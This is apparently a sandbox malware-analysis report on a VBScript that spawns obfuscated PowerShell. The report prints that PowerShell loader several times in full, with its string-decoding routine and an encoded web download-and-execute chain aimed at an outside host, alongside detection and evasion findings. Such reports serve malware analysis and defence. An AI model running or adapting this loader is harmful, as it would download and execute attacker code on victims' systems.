VBScript performs obfuscated calls to suspicious functions

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: ShellExecute("powershell", ""echo $Stenternstantiates; function Hus", "", "", "0");

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Anti Malware Scan Interface: echo $Stenternstantiates; function Husking($Sicklemia){$Afmilitariseringers=4;$Stenter=$Afmilitariseringers;do{$Musikgruppens+=$Sicklemia[$Stenter];$Stenter+=5} until(!$Sicklemia[$Stenter])$Musikgruppens}function Batiker179($Folketingsvalgenes){ .($opsamlingsbeholdernes) ($Folketingsvalgenes)}$opsamlingsbeholderens=Husking ' trnForsEBomut Dep.SeddW';$opsamlingsbeholderens+=Husking ' VulEUn.uBKontCIn.eLPsamiSupeEafskNSr uT';$Loppier=Husking 'BystMDrifo H mz .aaiNonslevaclUn oaAbor/';$Jalousidramaet=Husking 'FintTVenll rudsR ff1 bo 2';$Mhorr='Mid [ RanN.nimES yntPrst.SlagsEmboEApanr mpVHelaIBecacTrefESanspSkopoBegoI SnoNCharT Va,mF skA C tN.ammaInd.gForbEStyrR Q t]Lyco:Modt:K.imsDismE arecManou Ta R VlgiInortAareyproepsynsrYeasO Sl Tenmao VolcLtero FulL Ver=D,ed$K.lejKameAEdlalLayeOAnd.upressDel,I KetdHoveRBragaBaadM intA Im EE ekT';$Loppier+=Husking 'Fi l5.omm.Desp0H ck Besk(PoliWFraniOv rn MocdAmfeo onw F,rsL nk KommNkiriTEsth ,lem1Slde0In v.Tu n0 Muf;Omga OstWNondiHummnSou 6Elsd4 Apo;Ster Pi,fxSlag6 Va.4Nons;Vent Euour Snav Gro:Hale1 Ent3.voi1 Ame.Bygg0Intr)a ve coauGAnileMenacFlarkPostoRubi/ Kon2tat 0L.co1Tell0,bor0Snar1Bytn0Tabu1 Sti MecFDemiiBundr Bile Emif fmoSporxglau/Pref1Regi3Met.1Age .soli0';$Nedslidendes=Husking '.ontUA.stSTeleEBlepR Mes-PedaA ColgDes,eBrnen HalT';$Kjerstines=Husking 'Arv hForvtOpirtBlodpMelusOrbi:Enea/Lang/VenuoOpalfSyst1F ktxHugu.AfskiUdrac hrouFi.d/EuphYYu ekSoigHFartf.edlh FrlYFl,sCArcaF.igh/ onsghentlKra iHa,daBek.dO tsiPrean ConeModesPs k.St.lpLabof S nb';$Unsighted=Husking ' Met>';$opsamlingsbeholdernes=Husking 'Pre ISelveInd x';$Besprinkle='Libertine';$Beskaaret='\Unmidwifed.Sur';Batiker179 (Husking 'skum$ShilGCit l Ek.o GraBChriaTabel Col:HoredEghorCwm.y yklaHjrnsAl.c= ata$ ShaE FisNTypeVCest:Ua sA.acePO.rypSk kD ResaErv TIncoAPse + obe$heydbVocaeTracS ,orktr.pAUncoa illRFakteNo rt');Batiker179 (Husking 'Agla$A,stgsurmL DisODirgB linAuntrLFred:sproZSkkeo Albl H raSkabeProesOnonQPaasuOdyse Scr=Is.m$NvneK m,ljAfsieSkdeRMiliSRh,nt ctuIRustnPaleENl.tS,egi.AppeS Di PFumel Inditextt W e(.tev$ChrouVikiNSkrisRefiiHandG himhTrilTDrosEV njdAsfa)');Batiker179 (Husking $Mhorr);$Kjerstines=$Zolaesque[0];$Unplacement=(Husking ' Tra$PersGSan.L ,erOHedeB Th a.eseLAcme:SutssSadeUAftenModeB BacU ErgrTuyeNDaliIAr hnChroG ft=.uttN ,orENumaWV lt-UretoGa vB vej posEDrilcWindtvejv F tesDextyInteS,itmTRetme Fi m Fag. Sol$SupeoS quPnonrSBawdAOrchmGoo l arcI .amn F,aG hrySTellBPur.EChurHD naoYeell,entd.inse KonRRe eeBrevNSviks');Batiker179 ($Unplacement);Batiker179 (Husking 'tes,$,ommSGarduEkstnInfobS yruKhivr itenPar,iDemin.ncegRumi. U.fHDemue.erla St dPersepyrrrCoinsKore[Slut$MarkNAfdaeshagdTotasTrkglL vpiShocdDo.ueUnannsab.dKense Udgs Fil]Fors=Phos$SoliL IsooGarnpAlloppro,iYel ekoder');$karotiner=Husking 'Naad$Dai SConvuacran MisbTip,u ByprFarlnEm ri MednN rogBa.n.al aDKremoun ewP ecnFeldlEggco steaModtdBillFConsiMesolNosoeSm d(Sere$Dis,KSrkej ReaeLingrCoxcs lert Ae iStn nPa oeTr gsLyci,Cher$M tzSManou OinrDammeSklmfVulpo Ske

Suspicious powershell command line found

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Stenternstantiates; function Husking($Sicklemia){$Afmilitariseringers=4;$Stenter=$Afmilitariseringers;do{$Musikgruppens+=$Sicklemia[$Stenter];$Stenter+=5} until(!$Sicklemia[$Stenter])$Musikgruppens}function Batiker179($Folketingsvalgenes){ .($opsamlingsbeholdernes) ($Folketingsvalgenes)}$opsamlingsbeholderens=Husking ' trnForsEBomut Dep.SeddW';$opsamlingsbeholderens+=Husking ' VulEUn.uBKontCIn.eLPsamiSupeEafskNSr uT';$Loppier=Husking 'BystMDrifo H mz .aaiNonslevaclUn oaAbor/';$Jalousidramaet=Husking 'FintTVenll rudsR ff1 bo 2';$Mhorr='Mid [ RanN.nimES yntPrst.SlagsEmboEApanr mpVHelaIBecacTrefESanspSkopoBegoI SnoNCharT Va,mF skA C tN.ammaInd.gForbEStyrR Q t]Lyco:Modt:K.imsDismE arecManou Ta R VlgiInortAareyproepsynsrYeasO Sl Tenmao VolcLtero FulL Ver=D,ed$K.lejKameAEdlalLayeOAnd.upressDel,I KetdHoveRBragaBaadM intA Im EE ekT';$Loppier+=Husking 'Fi l5.omm.Desp0H ck Besk(PoliWFraniOv rn MocdAmfeo onw F,rsL nk KommNkiriTEsth ,lem1Slde0In v.Tu n0 Muf;Omga OstWNondiHummnSou 6Elsd4 Apo;Ster Pi,fxSlag6 Va.4Nons;Vent Euour Snav Gro:Hale1 Ent3.voi1 Ame.Bygg0Intr)a ve coauGAnileMenacFlarkPostoRubi/ Kon2tat 0L.co1Tell0,bor0Snar1Bytn0Tabu1 Sti MecFDemiiBundr Bile Emif fmoSporxglau/Pref1Regi3Met.1Age .soli0';$Nedslidendes=Husking '.ontUA.stSTeleEBlepR Mes-PedaA ColgDes,eBrnen HalT';$Kjerstines=Husking 'Arv hForvtOpirtBlodpMelusOrbi:Enea/Lang/VenuoOpalfSyst1F ktxHugu.AfskiUdrac hrouFi.d/EuphYYu ekSoigHFartf.edlh FrlYFl,sCArcaF.igh/ onsghentlKra iHa,daBek.dO tsiPrean ConeModesPs k.St.lpLabof S nb';$Unsighted=Husking ' Met>';$opsamlingsbeholdernes=Husking 'Pre ISelveInd x';$Besprinkle='Libertine';$Beskaaret='\Unmidwifed.Sur';Batiker179 (Husking 'skum$ShilGCit l Ek.o GraBChriaTabel Col:HoredEghorCwm.y yklaHjrnsAl.c= ata$ ShaE FisNTypeVCest:Ua sA.acePO.rypSk kD ResaErv TIncoAPse + obe$heydbVocaeTracS ,orktr.pAUncoa illRFakteNo rt');Batiker179 (Husking 'Agla$A,stgsurmL DisODirgB linAuntrLFred:sproZSkkeo Albl H raSkabeProesOnonQPaasuOdyse Scr=Is.m$NvneK m,ljAfsieSkdeRMiliSRh,nt ctuIRustnPaleENl.tS,egi.AppeS Di PFumel Inditextt W e(.tev$ChrouVikiNSkrisRefiiHandG himhTrilTDrosEV njdAsfa)');Batiker179 (Husking $Mhorr);$Kjerstines=$Zolaesque[0];$Unplacement=(Husking ' Tra$PersGSan.L ,erOHedeB Th a.eseLAcme:SutssSadeUAftenModeB BacU ErgrTuyeNDaliIAr hnChroG ft=.uttN ,orENumaWV lt-UretoGa vB vej posEDrilcWindtvejv F tesDextyInteS,itmTRetme Fi m Fag. Sol$SupeoS quPnonrSBawdAOrchmGoo l arcI .amn F,aG hrySTellBPur.EChurHD naoYeell,entd.inse KonRRe eeBrevNSviks');Batiker179 ($Unplacement);Batiker179 (Husking 'tes,$,ommSGarduEkstnInfobS yruKhivr itenPar,iDemin.ncegRumi. U.fHDemue.erla St dPersepyrrrCoinsKore[Slut$MarkNAfdaeshagdTotasTrkglL vpiShocdDo.ueUnannsab.dKense Udgs Fil]Fors=Phos$SoliL IsooGarnpAlloppro,iYel ekoder');$karotiner=Husking 'Naad$Dai SConvuacran MisbTip,u ByprFarlnEm ri MednN rogBa.n.al aDKremoun ewP ecnFeldlEggco steaModtdBillF
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Stenternstantiates; function Husking($Sicklemia){$Afmilitariseringers=4;$Stenter=$Afmilitariseringers;do{$Musikgruppens+=$Sicklemia[$Stenter];$Stenter+=5} until(!$Sicklemia[$Stenter])$Musikgruppens}function Batiker179($Folketingsvalgenes){ .($opsamlingsbeholdernes) ($Folketingsvalgenes)}$opsamlingsbeholderens=Husking ' trnForsEBomut Dep.SeddW';$opsamlingsbeholderens+=Husking ' VulEUn.uBKontCIn.eLPsamiSupeEafskNSr uT';$Loppier=Husking 'BystMDrifo H mz .aaiNonslevaclUn oaAbor/';$Jalousidramaet=Husking 'FintTVenll rudsR ff1 bo 2';$Mhorr='Mid [ RanN.nimES yntPrst.SlagsEmboEApanr mpVHelaIBecacTrefESanspSkopoBegoI SnoNCharT Va,mF skA C tN.ammaInd.gForbEStyrR Q t]Lyco:Modt:K.imsDismE arecManou Ta R VlgiInortAareyproepsynsrYeasO Sl Tenmao VolcLtero FulL Ver=D,ed$K.lejKameAEdlalLayeOAnd.upressDel,I KetdHoveRBragaBaadM intA Im EE ekT';$Loppier+=Husking 'Fi l5.omm.Desp0H ck Besk(PoliWFraniOv rn MocdAmfeo onw F,rsL nk KommNkiriTEsth ,lem1Slde0In v.Tu n0 Muf;Omga OstWNondiHummnSou 6Elsd4 Apo;Ster Pi,fxSlag6 Va.4Nons;Vent Euour Snav Gro:Hale1 Ent3.voi1 Ame.Bygg0Intr)a ve coauGAnileMenacFlarkPostoRubi/ Kon2tat 0L.co1Tell0,bor0Snar1Bytn0Tabu1 Sti MecFDemiiBundr Bile Emif fmoSporxglau/Pref1Regi3Met.1Age .soli0';$Nedslidendes=Husking '.ontUA.stSTeleEBlepR Mes-PedaA ColgDes,eBrnen HalT';$Kjerstines=Husking 'Arv hForvtOpirtBlodpMelusOrbi:Enea/Lang/VenuoOpalfSyst1F ktxHugu.AfskiUdrac hrouFi.d/EuphYYu ekSoigHFartf.edlh FrlYFl,sCArcaF.igh/ onsghentlKra iHa,daBek.dO tsiPrean ConeModesPs k.St.lpLabof S nb';$Unsighted=Husking ' Met>';$opsamlingsbeholdernes=Husking 'Pre ISelveInd x';$Besprinkle='Libertine';$Beskaaret='\Unmidwifed.Sur';Batiker179 (Husking 'skum$ShilGCit l Ek.o GraBChriaTabel Col:HoredEghorCwm.y yklaHjrnsAl.c= ata$ ShaE FisNTypeVCest:Ua sA.acePO.rypSk kD ResaErv TIncoAPse + obe$heydbVocaeTracS ,orktr.pAUncoa illRFakteNo rt');Batiker179 (Husking 'Agla$A,stgsurmL DisODirgB linAuntrLFred:sproZSkkeo Albl H raSkabeProesOnonQPaasuOdyse Scr=Is.m$NvneK m,ljAfsieSkdeRMiliSRh,nt ctuIRustnPaleENl.tS,egi.AppeS Di PFumel Inditextt W e(.tev$ChrouVikiNSkrisRefiiHandG himhTrilTDrosEV njdAsfa)');Batiker179 (Husking $Mhorr);$Kjerstines=$Zolaesque[0];$Unplacement=(Husking ' Tra$PersGSan.L ,erOHedeB Th a.eseLAcme:SutssSadeUAftenModeB BacU ErgrTuyeNDaliIAr hnChroG ft=.uttN ,orENumaWV lt-UretoGa vB vej posEDrilcWindtvejv F tesDextyInteS,itmTRetme Fi m Fag. Sol$SupeoS quPnonrSBawdAOrchmGoo l arcI .amn F,aG hrySTellBPur.EChurHD naoYeell,entd.inse KonRRe eeBrevNSviks');Batiker179 ($Unplacement);Batiker179 (Husking 'tes,$,ommSGarduEkstnInfobS yruKhivr itenPar,iDemin.ncegRumi. U.fHDemue.erla St dPersepyrrrCoinsKore[Slut$MarkNAfdaeshagdTotasTrkglL vpiShocdDo.ueUnannsab.dKense Udgs Fil]Fors=Phos$SoliL IsooGarnpAlloppro,iYel ekoder');$karotiner=Husking 'Naad$Dai SConvuacran MisbTip,u ByprFarlnEm ri MednN rogBa.n.al aDKremoun ewP ecnFeldlEggco steaModtdBillF			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFAAC0F5205 push eax; ret	2_2_00007FFAAC0F5251
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFAAC0F00AD pushad ; iretd	2_2_00007FFAAC0F00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFAAC1CCADC pushad ; retf 0000h	2_2_00007FFAAC1CCAE5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFAAC1CC35C push eax; iretd	2_2_00007FFAAC1CC35D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFAAC1C6414 pushad ; retf	2_2_00007FFAAC1C6415
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFAAC1CC4A3 push ecx; ret	2_2_00007FFAAC1CC4A9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFAAC1CC4A0 push ecx; ret	2_2_00007FFAAC1CC4A1

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6532			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3334			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 368

Thread sleep time: -6456360425798339s >= -30000s

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: powershell.exe, 00000002.00000002.1778189960.000001CBA47C8000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllCop

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: amsi64_2104.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 2104, type: MEMORYSTR

Source: C:\Windows\System32\wscript.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Stenternstantiates; function Husking($Sicklemia){$Afmilitariseringers=4;$Stenter=$Afmilitariseringers;do{$Musikgruppens+=$Sicklemia[$Stenter];$Stenter+=5} until(!$Sicklemia[$Stenter])$Musikgruppens}function Batiker179($Folketingsvalgenes){ .($opsamlingsbeholdernes) ($Folketingsvalgenes)}$opsamlingsbeholderens=Husking ' trnForsEBomut Dep.SeddW';$opsamlingsbeholderens+=Husking ' VulEUn.uBKontCIn.eLPsamiSupeEafskNSr uT';$Loppier=Husking 'BystMDrifo H mz .aaiNonslevaclUn oaAbor/';$Jalousidramaet=Husking 'FintTVenll rudsR ff1 bo 2';$Mhorr='Mid [ RanN.nimES yntPrst.SlagsEmboEApanr mpVHelaIBecacTrefESanspSkopoBegoI SnoNCharT Va,mF skA C tN.ammaInd.gForbEStyrR Q t]Lyco:Modt:K.imsDismE arecManou Ta R VlgiInortAareyproepsynsrYeasO Sl Tenmao VolcLtero FulL Ver=D,ed$K.lejKameAEdlalLayeOAnd.upressDel,I KetdHoveRBragaBaadM intA Im EE ekT';$Loppier+=Husking 'Fi l5.omm.Desp0H ck Besk(PoliWFraniOv rn MocdAmfeo onw F,rsL nk KommNkiriTEsth ,lem1Slde0In v.Tu n0 Muf;Omga OstWNondiHummnSou 6Elsd4 Apo;Ster Pi,fxSlag6 Va.4Nons;Vent Euour Snav Gro:Hale1 Ent3.voi1 Ame.Bygg0Intr)a ve coauGAnileMenacFlarkPostoRubi/ Kon2tat 0L.co1Tell0,bor0Snar1Bytn0Tabu1 Sti MecFDemiiBundr Bile Emif fmoSporxglau/Pref1Regi3Met.1Age .soli0';$Nedslidendes=Husking '.ontUA.stSTeleEBlepR Mes-PedaA ColgDes,eBrnen HalT';$Kjerstines=Husking 'Arv hForvtOpirtBlodpMelusOrbi:Enea/Lang/VenuoOpalfSyst1F ktxHugu.AfskiUdrac hrouFi.d/EuphYYu ekSoigHFartf.edlh FrlYFl,sCArcaF.igh/ onsghentlKra iHa,daBek.dO tsiPrean ConeModesPs k.St.lpLabof S nb';$Unsighted=Husking ' Met>';$opsamlingsbeholdernes=Husking 'Pre ISelveInd x';$Besprinkle='Libertine';$Beskaaret='\Unmidwifed.Sur';Batiker179 (Husking 'skum$ShilGCit l Ek.o GraBChriaTabel Col:HoredEghorCwm.y yklaHjrnsAl.c= ata$ ShaE FisNTypeVCest:Ua sA.acePO.rypSk kD ResaErv TIncoAPse + obe$heydbVocaeTracS ,orktr.pAUncoa illRFakteNo rt');Batiker179 (Husking 'Agla$A,stgsurmL DisODirgB linAuntrLFred:sproZSkkeo Albl H raSkabeProesOnonQPaasuOdyse Scr=Is.m$NvneK m,ljAfsieSkdeRMiliSRh,nt ctuIRustnPaleENl.tS,egi.AppeS Di PFumel Inditextt W e(.tev$ChrouVikiNSkrisRefiiHandG himhTrilTDrosEV njdAsfa)');Batiker179 (Husking $Mhorr);$Kjerstines=$Zolaesque[0];$Unplacement=(Husking ' Tra$PersGSan.L ,erOHedeB Th a.eseLAcme:SutssSadeUAftenModeB BacU ErgrTuyeNDaliIAr hnChroG ft=.uttN ,orENumaWV lt-UretoGa vB vej posEDrilcWindtvejv F tesDextyInteS,itmTRetme Fi m Fag. Sol$SupeoS quPnonrSBawdAOrchmGoo l arcI .amn F,aG hrySTellBPur.EChurHD naoYeell,entd.inse KonRRe eeBrevNSviks');Batiker179 ($Unplacement);Batiker179 (Husking 'tes,$,ommSGarduEkstnInfobS yruKhivr itenPar,iDemin.ncegRumi. U.fHDemue.erla St dPersepyrrrCoinsKore[Slut$MarkNAfdaeshagdTotasTrkglL vpiShocdDo.ueUnannsab.dKense Udgs Fil]Fors=Phos$SoliL IsooGarnpAlloppro,iYel ekoder');$karotiner=Husking 'Naad$Dai 